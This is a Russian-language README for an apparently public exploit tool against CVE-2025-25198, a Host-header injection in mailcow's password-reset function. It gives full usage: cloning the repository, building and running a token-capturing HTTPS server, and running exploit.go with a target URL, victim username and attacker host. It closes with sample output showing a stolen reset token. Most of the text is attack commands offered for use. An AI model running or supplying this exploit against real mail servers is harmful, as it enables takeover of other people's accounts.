
Захватывает токены сброса пароля при атаках через инъекцию Host-заголовка в Mailcow.
mailcow: dockerized — это открытый групповой почтовый комплект на основе docker. До версии 2025-01a уязвимость в функции сброса пароля mailcow позволяет злоумышленнику манипулировать заголовком Host HTTP для генерации ссылки сброса пароля, указывающей на контролируемый злоумышленником домен. Это может привести к захвату учётной записи, если пользователь перейдёт по отравленной ссылке.
Запускает https-сервер для приёма всех запросов и отправляет POST-запрос на сайт с заголовком Host, содержащим выбранный вами . Вы также можете использовать Burpsuite для отправки запроса и получения токена на сервере.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optional >
После небольшого ожидания сервер выведет токен, который вы можете использовать:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245